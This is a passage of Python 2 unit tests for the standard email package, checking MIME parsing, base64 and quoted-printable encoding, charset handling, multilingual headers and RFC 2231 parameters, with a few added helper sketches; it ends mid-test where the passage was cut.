neq = self.ndiffAssertEqual
# First a simple non-multipart message
msg = self._msgobj('msg_01.txt')
it = iterators.body_line_iterator(msg)
lines = list(it)
eq(len(lines), 6)
neq(EMPTYSTRING.join(lines), msg.get_payload())
# Now a more complicated multipart
msg = self._msgobj('msg_02.txt')
it = iterators.body_line_iterator(msg)
lines = list(it)
eq(len(lines), 43)
fp = openfile('msg_19.txt')
try:
neq(EMPTYSTRING.join(lines), fp.read())
finally:
fp.close()
def test_typed_subpart_iterator(self):
eq = self.assertEqual
msg = self._msgobj('msg_04.txt')
it = iterators.typed_subpart_iterator(msg, 'text')
lines = []
subparts = 0
for subpart in it:
subparts += 1
lines.append(subpart.get_payload())
eq(subparts, 2)
eq(EMPTYSTRING.join(lines), """\
a simple kind of mirror
to reflect upon our own
a simple kind of mirror
to reflect upon our own
""")
def test_typed_subpart_iterator_default_type(self):
eq = self.assertEqual
msg = self._msgobj('msg_03.txt')
it = iterators.typed_subpart_iterator(msg, 'text', 'plain')
lines = []
subparts = 0
for subpart in it:
subparts += 1
lines.append(subpart.get_payload())
eq(subparts, 1)
eq(EMPTYSTRING.join(lines), """\
Hi,
Do you like this message?
-Me
""")
class TestParsers(TestEmailBase):
def test_header_parser(self):
eq = self.assertEqual
# Parse only the headers of a complex multipart MIME document
fp = openfile('msg_02.txt')
try:
msg = HeaderParser().parse(fp)
finally:
fp.close()
eq(msg['from'], 'ppp-request@zzz.org')
eq(msg['to'], 'ppp@zzz.org')
eq(msg.get_content_type(), 'multipart/mixed')
self.failIf(msg.is_multipart())
self.failUnless(isinstance(msg.get_payload(), str))
def test_whitespace_continuation(self):
eq = self.assertEqual
# This message contains a line after the Subject: header that has only
# whitespace, but it is not empty!
msg = email.message_from_string("""\
From: aperson@dom.ain
To: bperson@dom.ain
Subject: the next line has a space on it
\x20
Date: Mon, 8 Apr 2002 15:09:19 -0400
Message-ID: spam
Here's the message body
""")
eq(msg['subject'], 'the next line has a space on it\n ')
eq(msg['message-id'], 'spam')
eq(msg.get_payload(), "Here's the message body\n")
def test_whitespace_continuation_last_header(self):
eq = self.assertEqual
# Like the previous test, but the subject line is the last
# header.
msg = email.message_from_string("""\
From: aperson@dom.ain
To: bperson@dom.ain
Date: Mon, 8 Apr 2002 15:09:19 -0400
Message-ID: spam
Subject: the next line has a space on it
\x20
Here's the message body
""")
eq(msg['subject'], 'the next line has a space on it\n ')
eq(msg['message-id'], 'spam')
eq(msg.get_payload(), "Here's the message body\n")
def test_crlf_separation(self):
eq = self.assertEqual
fp = openfile('msg_26.txt', mode='rb')
try:
msg = Parser().parse(fp)
finally:
fp.close()
eq(len(msg.get_payload()), 2)
part1 = msg.get_payload(0)
eq(part1.get_content_type(), 'text/plain')
eq(part1.get_payload(), 'Simple email with attachment.\r\n\r\n')
part2 = msg.get_payload(1)
eq(part2.get_content_type(), 'application/riscos')
def test_multipart_digest_with_extra_mime_headers(self):
eq = self.assertEqual
neq = self.ndiffAssertEqual
fp = openfile('msg_28.txt')
try:
msg = email.message_from_file(fp)
finally:
fp.close()
# Structure is:
# multipart/digest
# message/rfc822
# text/plain
# message/rfc822
# text/plain
eq(msg.is_multipart(), 1)
eq(len(msg.get_payload()), 2)
part1 = msg.get_payload(0)
eq(part1.get_content_type(), 'message/rfc822')
eq(part1.is_multipart(), 1)
eq(len(part1.get_payload()), 1)
part1a = part1.get_payload(0)
eq(part1a.is_multipart(), 0)
eq(part1a.get_content_type(), 'text/plain')
neq(part1a.get_payload(), 'message 1\n')
# next message/rfc822
part2 = msg.get_payload(1)
eq(part2.get_content_type(), 'message/rfc822')
eq(part2.is_multipart(), 1)
eq(len(part2.get_payload()), 1)
part2a = part2.get_payload(0)
eq(part2a.is_multipart(), 0)
eq(part2a.get_content_type(), 'text/plain')
neq(part2a.get_payload(), 'message 2\n')
def test_three_lines(self):
# A bug report by Andrew McNamara
lines = ['From: Andrew Person <aperson@dom.ain',
'Subject: Test',
'Date: Tue, 20 Aug 2002 16:43:45 +1000']
msg = email.message_from_string(NL.join(lines))
self.assertEqual(msg['date'], 'Tue, 20 Aug 2002 16:43:45 +1000')
def test_strip_line_feed_and_carriage_return_in_headers(self):
eq = self.assertEqual
# Regression test for SF bug [ 1002475 ]: the email message parser didn't handle \r\n correctly
value1 = 'text'
value2 = 'more text'
m = 'Header: %s\r\nNext-Header: %s\r\n\r\nBody\r\n\r\n' % (
value1, value2)
msg = email.message_from_string(m)
eq(msg.get('Header'), value1)
eq(msg.get('Next-Header'), value2)
def test_rfc2822_header_syntax(self):
eq = self.assertEqual
m = '>From: foo\nFrom: bar\n!"#QUX;~: zoo\n\nbody'
msg = email.message_from_string(m)
eq(len(msg.keys()), 3)
keys = msg.keys()
keys.sort()
eq(keys, ['!"#QUX;~', '>From', 'From'])
eq(msg.get_payload(), 'body')
def test_rfc2822_space_not_allowed_in_header(self):
eq = self.assertEqual
m = '>From foo@example.com 11:25:53\nFrom: bar\n!"#QUX;~: zoo\n\nbody'
msg = email.message_from_string(m)
eq(len(msg.keys()), 0)
def test_rfc2822_one_character_header(self):
eq = self.assertEqual
m = 'A: first header\nB: second header\nCC: third header\n\nbody'
msg = email.message_from_string(m)
headers = msg.keys()
headers.sort()
eq(headers, ['A', 'B', 'CC'])
eq(msg.get_payload(), 'body')
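# Illustrative sketch (added; not part of the original suite): HeaderParser
# parses only the headers, leaving the entire remainder -- even a multipart
# body -- as one string payload, which is what test_header_parser asserts.
def _headerparser_demo(text):
    msg = HeaderParser().parsestr(text)
    return msg.is_multipart(), msg.get_payload()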
class TestBase64(unittest.TestCase):
def test_len(self):
eq = self.assertEqual
eq(base64mime.base64_len('hello'),
len(base64mime.encode('hello', eol='')))
for size in range(15):
if size == 0 : bsize = 0
elif size <= 3 : bsize = 4
elif size <= 6 : bsize = 8
elif size <= 9 : bsize = 12
elif size <= 12: bsize = 16
else : bsize = 20
eq(base64mime.base64_len('x'*size), bsize)
def test_decode(self):
eq = self.assertEqual
eq(base64mime.decode(''), '')
eq(base64mime.decode('aGVsbG8='), 'hello')
eq(base64mime.decode('aGVsbG8=', 'X'), 'hello')
eq(base64mime.decode('aGVsbG8NCndvcmxk\n', 'X'), 'helloXworld')
def test_encode(self):
eq = self.assertEqual
eq(base64mime.encode(''), '')
eq(base64mime.encode('hello'), 'aGVsbG8=\n')
# Test the binary flag
eq(base64mime.encode('hello\n'), 'aGVsbG8K\n')
eq(base64mime.encode('hello\n', 0), 'aGVsbG8NCg==\n')
# Test the maxlinelen arg
eq(base64mime.encode('xxxx ' * 20, maxlinelen=40), """\
eHh4eCB4eHh4IHh4eHggeHh4eCB4eHh4IHh4eHgg
eHh4eCB4eHh4IHh4eHggeHh4eCB4eHh4IHh4eHgg
eHh4eCB4eHh4IHh4eHggeHh4eCB4eHh4IHh4eHgg
eHh4eCB4eHh4IA==
""")
# Test the eol argument
eq(base64mime.encode('xxxx ' * 20, maxlinelen=40, eol='\r\n'), """\
eHh4eCB4eHh4IHh4eHggeHh4eCB4eHh4IHh4eHgg\r
eHh4eCB4eHh4IHh4eHggeHh4eCB4eHh4IHh4eHgg\r
eHh4eCB4eHh4IHh4eHggeHh4eCB4eHh4IHh4eHgg\r
eHh4eCB4eHh4IA==\r
""")
def test_header_encode(self):
eq = self.assertEqual
he = base64mime.header_encode
eq(he('hello'), '=?iso-8859-1?b?aGVsbG8=?=')
eq(he('hello\nworld'), '=?iso-8859-1?b?aGVsbG8NCndvcmxk?=')
# Test the charset option
eq(he('hello', charset='iso-8859-2'), '=?iso-8859-2?b?aGVsbG8=?=')
# Test the keep_eols flag
eq(he('hello\nworld', keep_eols=True),
'=?iso-8859-1?b?aGVsbG8Kd29ybGQ=?=')
# Test the maxlinelen argument
eq(he('xxxx ' * 20, maxlinelen=40), """\
=?iso-8859-1?b?eHh4eCB4eHh4IHh4eHggeHg=?=
=?iso-8859-1?b?eHggeHh4eCB4eHh4IHh4eHg=?=
=?iso-8859-1?b?IHh4eHggeHh4eCB4eHh4IHg=?=
=?iso-8859-1?b?eHh4IHh4eHggeHh4eCB4eHg=?=
=?iso-8859-1?b?eCB4eHh4IHh4eHggeHh4eCA=?=
=?iso-8859-1?b?eHh4eCB4eHh4IHh4eHgg?=""")
# Test the eol argument
eq(he('xxxx ' * 20, maxlinelen=40, eol='\r\n'), """\
=?iso-8859-1?b?eHh4eCB4eHh4IHh4eHggeHg=?=\r
=?iso-8859-1?b?eHggeHh4eCB4eHh4IHh4eHg=?=\r
=?iso-8859-1?b?IHh4eHggeHh4eCB4eHh4IHg=?=\r
=?iso-8859-1?b?eHh4IHh4eHggeHh4eCB4eHg=?=\r
=?iso-8859-1?b?eCB4eHh4IHh4eHggeHh4eCA=?=\r
=?iso-8859-1?b?eHh4eCB4eHh4IHh4eHgg?=""")
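# Illustrative sketch (added): base64mime.encode()/decode() are inverses for
# body encoding, which is the invariant the class above probes in detail.
def _base64mime_demo():
    enc = base64mime.encode('hello')        # 'aGVsbG8=\n'
    return base64mime.decode(enc) == 'hello'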
class TestQuopri(unittest.TestCase):
def setUp(self):
self.hlit = [chr(x) for x in range(ord('a'), ord('z')+1)] + \
[chr(x) for x in range(ord('A'), ord('Z')+1)] + \
[chr(x) for x in range(ord('0'), ord('9')+1)] + \
['!', '*', '+', '-', '/', ' ']
self.hnon = [chr(x) for x in range(256) if chr(x) not in self.hlit]
assert len(self.hlit) + len(self.hnon) == 256
self.blit = [chr(x) for x in range(ord(' '), ord('~')+1)] + ['\t']
self.blit.remove('=')
self.bnon = [chr(x) for x in range(256) if chr(x) not in self.blit]
assert len(self.blit) + len(self.bnon) == 256
def test_header_quopri_check(self):
for c in self.hlit:
self.failIf(quoprimime.header_quopri_check(c))
for c in self.hnon:
self.failUnless(quoprimime.header_quopri_check(c))
def test_body_quopri_check(self):
for c in self.blit:
self.failIf(quoprimime.body_quopri_check(c))
for c in self.bnon:
self.failUnless(quoprimime.body_quopri_check(c))
def test_header_quopri_len(self):
eq = self.assertEqual
hql = quoprimime.header_quopri_len
enc = quoprimime.header_encode
for s in ('hello', 'h@e@l@l@o@'):
# Empty charset and no line-endings; 7 == the RFC 2047 chrome ('=?' + '?q?' + '?=')
eq(hql(s), len(enc(s, charset='', eol=''))-7)
for c in self.hlit:
eq(hql(c), 1)
for c in self.hnon:
eq(hql(c), 3)
def test_body_quopri_len(self):
eq = self.assertEqual
bql = quoprimime.body_quopri_len
for c in self.blit:
eq(bql(c), 1)
for c in self.bnon:
eq(bql(c), 3)
def test_quote_unquote_idempotent(self):
for x in range(256):
c = chr(x)
self.assertEqual(quoprimime.unquote(quoprimime.quote(c)), c)
def test_header_encode(self):
eq = self.assertEqual
he = quoprimime.header_encode
eq(he('hello'), '=?iso-8859-1?q?hello?=')
eq(he('hello\nworld'), '=?iso-8859-1?q?hello=0D=0Aworld?=')
# Test the charset option
eq(he('hello', charset='iso-8859-2'), '=?iso-8859-2?q?hello?=')
# Test the keep_eols flag
eq(he('hello\nworld', keep_eols=True), '=?iso-8859-1?q?hello=0Aworld?=')
# Test a non-ASCII character
eq(he('hello\xc7there'), '=?iso-8859-1?q?hello=C7there?=')
# Test the maxlinelen argument
eq(he('xxxx ' * 20, maxlinelen=40), """\
=?iso-8859-1?q?xxxx_xxxx_xxxx_xxxx_xx?=
=?iso-8859-1?q?xx_xxxx_xxxx_xxxx_xxxx?=
=?iso-8859-1?q?_xxxx_xxxx_xxxx_xxxx_x?=
=?iso-8859-1?q?xxx_xxxx_xxxx_xxxx_xxx?=
=?iso-8859-1?q?x_xxxx_xxxx_?=""")
# Test the eol argument
eq(he('xxxx ' * 20, maxlinelen=40, eol='\r\n'), """\
=?iso-8859-1?q?xxxx_xxxx_xxxx_xxxx_xx?=\r
=?iso-8859-1?q?xx_xxxx_xxxx_xxxx_xxxx?=\r
=?iso-8859-1?q?_xxxx_xxxx_xxxx_xxxx_x?=\r
=?iso-8859-1?q?xxx_xxxx_xxxx_xxxx_xxx?=\r
=?iso-8859-1?q?x_xxxx_xxxx_?=""")
def test_decode(self):
eq = self.assertEqual
eq(quoprimime.decode(''), '')
eq(quoprimime.decode('hello'), 'hello')
eq(quoprimime.decode('hello', 'X'), 'hello')
eq(quoprimime.decode('hello\nworld', 'X'), 'helloXworld')
def test_encode(self):
eq = self.assertEqual
eq(quoprimime.encode(''), '')
eq(quoprimime.encode('hello'), 'hello')
# Test the binary flag
eq(quoprimime.encode('hello\r\nworld'), 'hello\nworld')
eq(quoprimime.encode('hello\r\nworld', 0), 'hello\nworld')
# Test the maxlinelen arg
eq(quoprimime.encode('xxxx ' * 20, maxlinelen=40), """\
xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx=
xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxx=
x xxxx xxxx xxxx xxxx=20""")
# Test the eol argument
eq(quoprimime.encode('xxxx ' * 20, maxlinelen=40, eol='\r\n'), """\
xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx=\r
xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxx=\r
x xxxx xxxx xxxx xxxx=20""")
eq(quoprimime.encode("""\
one line
two line"""), """\
one line
two line""")
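# Illustrative sketch (added): quoprimime.quote()/unquote() are exact
# inverses for any single byte, which test_quote_unquote_idempotent checks
# exhaustively over all 256 values.
def _quopri_demo():
    return quoprimime.unquote(quoprimime.quote('=')) == '='  # '=' -> '=3D' -> '='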
# Test the Charset class
class TestCharset(unittest.TestCase):
def tearDown(self):
from email import charset as CharsetModule
try:
del CharsetModule.CHARSETS['fake']
except KeyError:
pass
def test_idempotent(self):
eq = self.assertEqual
# Make sure us-ascii = no Unicode conversion
c = Charset('us-ascii')
s = 'Hello World!'
sp = c.to_splittable(s)
eq(s, c.from_splittable(sp))
# test 8-bit idempotency with us-ascii
s = '\xa4\xa2\xa4\xa4\xa4\xa6\xa4\xa8\xa4\xaa'
sp = c.to_splittable(s)
eq(s, c.from_splittable(sp))
def test_body_encode(self):
eq = self.assertEqual
# Try a charset with QP body encoding
c = Charset('iso-8859-1')
eq('hello w=F6rld', c.body_encode('hello w\xf6rld'))
# Try a charset with Base64 body encoding
c = Charset('utf-8')
eq('aGVsbG8gd29ybGQ=\n', c.body_encode('hello world'))
# Try a charset with None body encoding
c = Charset('us-ascii')
eq('hello world', c.body_encode('hello world'))
# Try the convert argument, where input codec <> output codec
c = Charset('euc-jp')
# With apologies to Tokio Kikuchi ;)
try:
eq('\x1b$B5FCO;~IW\x1b(B',
c.body_encode('\xb5\xc6\xc3\xcf\xbb\xfe\xc9\xd7'))
eq('\xb5\xc6\xc3\xcf\xbb\xfe\xc9\xd7',
c.body_encode('\xb5\xc6\xc3\xcf\xbb\xfe\xc9\xd7', False))
except LookupError:
# We probably don't have the Japanese codecs installed
pass
# Testing SF bug #625509, which we have to fake, since there are no
# built-in encodings where the header encoding is QP but the body
# encoding is not.
from email import charset as CharsetModule
CharsetModule.add_charset('fake', CharsetModule.QP, None)
c = Charset('fake')
eq('hello w\xf6rld', c.body_encode('hello w\xf6rld'))
def test_unicode_charset_name(self):
charset = Charset(u'us-ascii')
self.assertEqual(str(charset), 'us-ascii')
self.assertRaises(errors.CharsetError, Charset, 'asc\xffii')
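# Illustrative sketch (added): a Charset decides the body transfer encoding,
# so iso-8859-1 text comes out quoted-printable, as test_body_encode shows.
def _charset_demo():
    c = Charset('iso-8859-1')
    return c.body_encode('hello w\xf6rld')  # -> 'hello w=F6rld'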
# Test multilingual MIME headers.
class TestHeader(TestEmailBase):
def test_simple(self):
eq = self.ndiffAssertEqual
h = Header('Hello World!')
eq(h.encode(), 'Hello World!')
h.append(' Goodbye World!')
eq(h.encode(), 'Hello World! Goodbye World!')
def test_simple_surprise(self):
eq = self.ndiffAssertEqual
h = Header('Hello World!')
eq(h.encode(), 'Hello World!')
h.append('Goodbye World!')
eq(h.encode(), 'Hello World! Goodbye World!')
def test_header_needs_no_decoding(self):
h = 'no decoding needed'
self.assertEqual(decode_header(h), [(h, None)])
def test_long(self):
h = Header("I am the very model of a modern Major-General; I've information vegetable, animal, and mineral; I know the kings of England, and I quote the fights historical from Marathon to Waterloo, in order categorical; I'm very well acquainted, too, with matters mathematical; I understand equations, both the simple and quadratical; about binomial theorem I'm teeming with a lot o' news, with many cheerful facts about the square of the hypotenuse.",
maxlinelen=76)
for l in h.encode(splitchars=' ').split('\n '):
self.failUnless(len(l) <= 76)
def test_multilingual(self):
eq = self.ndiffAssertEqual
g = Charset("iso-8859-1")
cz = Charset("iso-8859-2")
utf8 = Charset("utf-8")
g_head = "Die Mieter treten hier ein werden mit einem Foerderband komfortabel den Korridor entlang, an s\xfcdl\xfcndischen Wandgem\xe4lden vorbei, gegen die rotierenden Klingen bef\xf6rdert. "
cz_head = "Finan\xe8ni metropole se hroutily pod tlakem jejich d\xf9vtipu.. "
utf8_head = u"\u6b63\u78ba\u306b\u8a00\u3046\u3068\u7ffb\u8a33\u306f\u3055\u308c\u3066\u3044\u307e\u305b\u3093\u3002\u4e00\u90e8\u306f\u30c9\u30a4\u30c4\u8a9e\u3067\u3059\u304c\u3001\u3042\u3068\u306f\u3067\u305f\u3089\u3081\u3067\u3059\u3002\u5b9f\u969b\u306b\u306f\u300cWenn ist das Nunstuck git und Slotermeyer? Ja! Beiherhund das Oder die Flipperwaldt gersput.\u300d\u3068\u8a00\u3063\u3066\u3044\u307e\u3059\u3002".encode("utf-8")
h = Header(g_head, g)
h.append(cz_head, cz)
h.append(utf8_head, utf8)
enc = h.encode()
eq(enc, """\
=?iso-8859-1?q?Die_Mieter_treten_hier_ein_werden_mit_einem_Foerderband_ko?=
=?iso-8859-1?q?mfortabel_den_Korridor_entlang=2C_an_s=FCdl=FCndischen_Wan?=
=?iso-8859-1?q?dgem=E4lden_vorbei=2C_gegen_die_rotierenden_Klingen_bef=F6?=
=?iso-8859-1?q?rdert=2E_?= =?iso-8859-2?q?Finan=E8ni_metropole_se_hroutily?=
=?iso-8859-2?q?_pod_tlakem_jejich_d=F9vtipu=2E=2E_?= =?utf-8?b?5q2j56K6?=
=?utf-8?b?44Gr6KiA44GG44Go57+76Kiz44Gv44GV44KM44Gm44GE44G+44Gb44KT44CC?=
=?utf-8?b?5LiA6YOo44Gv44OJ44Kk44OE6Kqe44Gn44GZ44GM44CB44GC44Go44Gv44Gn?=
=?utf-8?b?44Gf44KJ44KB44Gn44GZ44CC5a6f6Zqb44Gr44Gv44CMV2VubiBpc3QgZGFz?=
=?utf-8?q?_Nunstuck_git_und_Slotermeyer=3F_Ja!_Beiherhund_das_Oder_die_Fl?=
=?utf-8?b?aXBwZXJ3YWxkdCBnZXJzcHV0LuOAjeOBqOiogOOBo+OBpuOBhOOBvuOBmQ==?=
=?utf-8?b?44CC?=""")
eq(decode_header(enc),
[(g_head, "iso-8859-1"), (cz_head, "iso-8859-2"),
(utf8_head, "utf-8")])
ustr = unicode(h)
eq(ustr.encode('utf-8'),
'Die Mieter treten hier ein werden mit einem Foerderband '
'komfortabel den Korridor entlang, an s\xc3\xbcdl\xc3\xbcndischen '
'Wandgem\xc3\xa4lden vorbei, gegen die rotierenden Klingen '
'bef\xc3\xb6rdert. Finan\xc4\x8dni metropole se hroutily pod '
'tlakem jejich d\xc5\xafvtipu.. \xe6\xad\xa3\xe7\xa2\xba\xe3\x81'
'\xab\xe8\xa8\x80\xe3\x81\x86\xe3\x81\xa8\xe7\xbf\xbb\xe8\xa8\xb3'
'\xe3\x81\xaf\xe3\x81\x95\xe3\x82\x8c\xe3\x81\xa6\xe3\x81\x84\xe3'
'\x81\xbe\xe3\x81\x9b\xe3\x82\x93\xe3\x80\x82\xe4\xb8\x80\xe9\x83'
'\xa8\xe3\x81\xaf\xe3\x83\x89\xe3\x82\xa4\xe3\x83\x84\xe8\xaa\x9e'
'\xe3\x81\xa7\xe3\x81\x99\xe3\x81\x8c\xe3\x80\x81\xe3\x81\x82\xe3'
'\x81\xa8\xe3\x81\xaf\xe3\x81\xa7\xe3\x81\x9f\xe3\x82\x89\xe3\x82'
'\x81\xe3\x81\xa7\xe3\x81\x99\xe3\x80\x82\xe5\xae\x9f\xe9\x9a\x9b'
'\xe3\x81\xab\xe3\x81\xaf\xe3\x80\x8cWenn ist das Nunstuck git '
'und Slotermeyer? Ja! Beiherhund das Oder die Flipperwaldt '
'gersput.\xe3\x80\x8d\xe3\x81\xa8\xe8\xa8\x80\xe3\x81\xa3\xe3\x81'
'\xa6\xe3\x81\x84\xe3\x81\xbe\xe3\x81\x99\xe3\x80\x82')
# Test make_header()
newh = make_header(decode_header(enc))
eq(newh, enc)
def test_header_ctor_default_args(self):
eq = self.ndiffAssertEqual
h = Header()
eq(h, '')
h.append('foo', Charset('iso-8859-1'))
eq(h, '=?iso-8859-1?q?foo?=')
def test_explicit_maxlinelen(self):
eq = self.ndiffAssertEqual
hstr = 'A very long line that must get split to something other than at the 76th character boundary to test the non-default behavior'
h = Header(hstr)
eq(h.encode(), '''\
A very long line that must get split to something other than at the 76th
character boundary to test the non-default behavior''')
h = Header(hstr, header_name='Subject')
eq(h.encode(), '''\
A very long line that must get split to something other than at the
76th character boundary to test the non-default behavior''')
h = Header(hstr, maxlinelen=1024, header_name='Subject')
eq(h.encode(), hstr)
def test_us_ascii_header(self):
eq = self.assertEqual
s = 'hello'
x = decode_header(s)
eq(x, [('hello', None)])
h = make_header(x)
eq(s, h.encode())
def test_string_charset(self):
eq = self.assertEqual
h = Header()
h.append('hello', 'iso-8859-1')
eq(h, '=?iso-8859-1?q?hello?=')
## def test_unicode_error(self):
## raises = self.assertRaises
## raises(UnicodeError, Header, u'[P\xf6stal]', 'us-ascii')
## raises(UnicodeError, Header, '[P\xf6stal]', 'us-ascii')
## h = Header()
## raises(UnicodeError, h.append, u'[P\xf6stal]', 'us-ascii')
## raises(UnicodeError, h.append, '[P\xf6stal]', 'us-ascii')
## raises(UnicodeError, Header, u'\u83ca\u5730\u6642\u592b', 'iso-8859-1')
def test_utf8_shortest(self):
eq = self.assertEqual
h = Header(u'p\xf6stal', 'utf-8')
eq(h.encode(), '=?utf-8?q?p=C3=B6stal?=')
h = Header(u'\u83ca\u5730\u6642\u592b', 'utf-8')
eq(h.encode(), '=?utf-8?b?6I+K5Zyw5pmC5aSr?=')
def test_bad_8bit_header(self):
raises = self.assertRaises
eq = self.assertEqual
x = 'Ynwp4dUEbay Auction Semiar- No Charge \x96 Earn Big'
raises(UnicodeError, Header, x)
h = Header()
raises(UnicodeError, h.append, x)
eq(str(Header(x, errors='replace')), x)
h.append(x, errors='replace')
eq(str(h), x)
def test_encoded_adjacent_nonencoded(self):
eq = self.assertEqual
h = Header()
h.append('hello', 'iso-8859-1')
h.append('world')
s = h.encode()
eq(s, '=?iso-8859-1?q?hello?= world')
h = make_header(decode_header(s))
eq(h.encode(), s)
def test_whitespace_eater(self):
eq = self.assertEqual
s = 'Subject: =?koi8-r?b?8NLP18XSy8EgzsEgxsnOwczYztk=?= =?koi8-r?q?=CA?= zz.'
parts = decode_header(s)
eq(parts, [('Subject:', None), ('\xf0\xd2\xcf\xd7\xc5\xd2\xcb\xc1 \xce\xc1 \xc6\xc9\xce\xc1\xcc\xd8\xce\xd9\xca', 'koi8-r'), ('zz.', None)])
hdr = make_header(parts)
eq(hdr.encode(),
'Subject: =?koi8-r?b?8NLP18XSy8EgzsEgxsnOwczYztnK?= zz.')
def test_broken_base64_header(self):
raises = self.assertRaises
s = 'Subject: =?EUC-KR?B?CSixpLDtKSC/7Liuvsax4iC6uLmwMcijIKHaILzSwd/H0SC8+LCjwLsgv7W/+Mj3IQ?='
raises(errors.HeaderParseError, decode_header, s)
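# Illustrative sketch (added; helper name is ours): Header accumulates
# (string, charset) chunks and encode() renders them as one RFC 2047 value.
def _header_demo():
    h = Header('hello', 'iso-8859-1')
    h.append('world')
    return h.encode()  # '=?iso-8859-1?q?hello?= world'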
# Test RFC 2231 header parameters (en/de)coding
class TestRFC2231(TestEmailBase):
def test_get_param(self):
eq = self.assertEqual
msg = self._msgobj('msg_29.txt')
eq(msg.get_param('title'),
('us-ascii', 'en', 'This is even more ***fun*** isn\'t it!'))
eq(msg.get_param('title', unquote=False),
('us-ascii', 'en', '"This is even more ***fun*** isn\'t it!"'))
def test_set_param(self):
eq = self.assertEqual
msg = Message()
msg.set_param('title', 'This is even more ***fun*** isn\'t it!',
charset='us-ascii')
eq(msg.get_param('title'),
('us-ascii', '', 'This is even more ***fun*** isn\'t it!'))
msg.set_param('title', 'This is even more ***fun*** isn\'t it!',
charset='us-ascii', language='en')
eq(msg.get_param('title'),
('us-ascii', 'en', 'This is even more ***fun*** isn\'t it!'))
msg = self._msgobj('msg_01.txt')
msg.set_param('title', 'This is even more ***fun*** isn\'t it!',
charset='us-ascii', language='en')
eq(msg.as_string(), """\
Return-Path: <bbb@zzz.org>
Delivered-To: bbb@zzz.org
Received: by mail.zzz.org (Postfix, from userid 889)
\tid 27CEAD38CC; Fri, 4 May 2001 14:05:44 -0400 (EDT)
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Message-ID: <15090.61304.110929.45684@aaa.zzz.org>
From: bbb@ddd.com (John X. Doe)
To: bbb@zzz.org
Subject: This is a test message
Date: Fri, 4 May 2001 14:05:44 -0400
Content-Type: text/plain; charset=us-ascii;
\ttitle*="us-ascii'en'This%20is%20even%20more%20%2A%2A%2Afun%2A%2A%2A%20isn%27t%20it%21"
Hi,
Do you like this message?
-Me
""")
def test_del_param(self):
eq = self.ndiffAssertEqual
msg = self._msgobj('msg_01.txt')
msg.set_param('foo', 'bar', charset='us-ascii', language='en')
msg.set_param('title', 'This is even more ***fun*** isn\'t it!',
charset='us-ascii', language='en')
msg.del_param('foo', header='Content-Type')
eq(msg.as_string(), """\
Return-Path: <bbb@zzz.org>
Delivered-To: bbb@zzz.org
Received: by mail.zzz.org (Postfix, from userid 889)
\tid 27CEAD38CC; Fri, 4 May 2001 14:05:44 -0400 (EDT)
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Message-ID: <15090.61304.110929.45684@aaa.zzz.org>
From: bbb@ddd.com (John X. Doe)
To: bbb@zzz.org
Subject: This is a test message
Date: Fri, 4 May 2001 14:05:44 -0400
Content-Type: text/plain; charset="us-ascii";
\ttitle*="us-ascii'en'This%20is%20even%20more%20%2A%2A%2Afun%2A%2A%2A%20isn%27t%20it%21"
Hi,
Do you like this message?
-Me
""")
def test_rfc2231_get_content_charset(self):
eq = self.assertEqual
msg = self._msgobj('msg_32.txt')
eq(msg.get_content_charset(), 'us-ascii')
def test_rfc2231_no_language_or_charset(self):
m = '''\
Content-Transfer-Encoding: 8bit
Content-Disposition: inline; filename="file____C__DOCUMENTS_20AND_20SETTINGS_FABIEN_LOCAL_20SETTINGS_TEMP_nsmail.htm"
Content-Type: text/html; NAME*0=file____C__DOCUMENTS_20AND_20SETTINGS_FABIEN_LOCAL_20SETTINGS_TEM; NAME*1=P_nsmail.htm
'''
msg = email.message_from_string(m)
param = msg.get_param('NAME')
self.failIf(isinstance(param, tuple))
self.assertEqual(
param,
'file____C__DOCUMENTS_20AND_20SETTINGS_FABIEN_LOCAL_20SETTINGS_TEMP_nsmail.htm')
def test_rfc2231_no_language_or_charset_in_filename(self):
m = '''\
Content-Disposition: inline;
\tfilename*0*="''This%20is%20even%20more%20";
\tfilename*1*="%2A%2A%2Afun%2A%2A%2A%20";
\tfilename*2="is it not.pdf"
'''
msg = email.message_from_string(m)
self.assertEqual(msg.get_filename(),
'This is even more ***fun*** is it not.pdf')
def test_rfc2231_no_language_or_charset_in_filename_encoded(self):
m = '''\
Content-Disposition: inline;
\tfilename*0*="''This%20is%20even%20more%20";
\tfilename*1*="%2A%2A%2Afun%2A%2A%2A%20";
\tfilename*2="is it not.pdf"
'''
msg = email.message_from_string(m)
self.assertEqual(msg.get_filename(),
'This is even more ***fun*** is it not.pdf')
def test_rfc2231_partly_encoded(self):
m = '''\
Content-Disposition: inline;
\tfilename*0="''This%20is%20even%20more%20";
\tfilename*1*="%2A%2A%2Afun%2A%2A%2A%20";
\tfilename*2="is it not.pdf"
'''
msg = email.message_from_string(m)
self.assertEqual(
msg.get_filename(),
'This%20is%20even%20more%20***fun*** is it not.pdf')
def test_rfc2231_partly_nonencoded(self):
m = '''\
Content-Disposition: inline;
\tfilename*0="This%20is%20even%20more%20";
\tfilename*1="%2A%2A%2Afun%2A%2A%2A%20";
\tfilename*2="is it not.pdf"
'''
msg = email.message_from_string(m)
self.assertEqual(
msg.get_filename(),
'This%20is%20even%20more%20%2A%2A%2Afun%2A%2A%2A%20is it not.pdf')
def test_rfc2231_no_language_or_charset_in_boundary(self):
m = '''\
Content-Type: multipart/alternative;
\tboundary*0*="''This%20is%20even%20more%20";
\tboundary*1*="%2A%2A%2Afun%2A%2A%2A%20";
\tboundary*2="is it not.pdf"
'''
msg = email.message_from_string(m)
self.assertEqual(msg.get_boundary(),
'This is even more ***fun*** is it not.pdf')
def test_rfc2231_no_language_or_charset_in_charset(self):
# This is a nonsensical charset value, but tests the code anyway
m = '''\
Content-Type: text/plain;
\tcharset*0*="This%20is%20even%20more%20";
\tcharset*1*="%2A%2A%2Afun%2A%2A%2A%20";
\tcharset*2="is it not.pdf"
'''
msg = email.message_from_string(m)
self.assertEqual(msg.get_content_charset(),
'this is even more ***fun*** is it not.pdf')
def test_rfc2231_bad_encoding_in_filename(self):
m = '''\
Content-Disposition: inline;
\tfilename*0*="bogus'xx'This%20is%20even%20more%20";
\tfilename*1*="%2A%2A%2Afun%2A%2A%2A%20";
\tfilename*2="is it not.pdf"
'''
msg = email.message_from_string(m)
self.assertEqual(msg.get_filename(),
'This is even more ***fun*** is it not.pdf')
def test_rfc2231_bad_encoding_in_charset(self):
m = """\
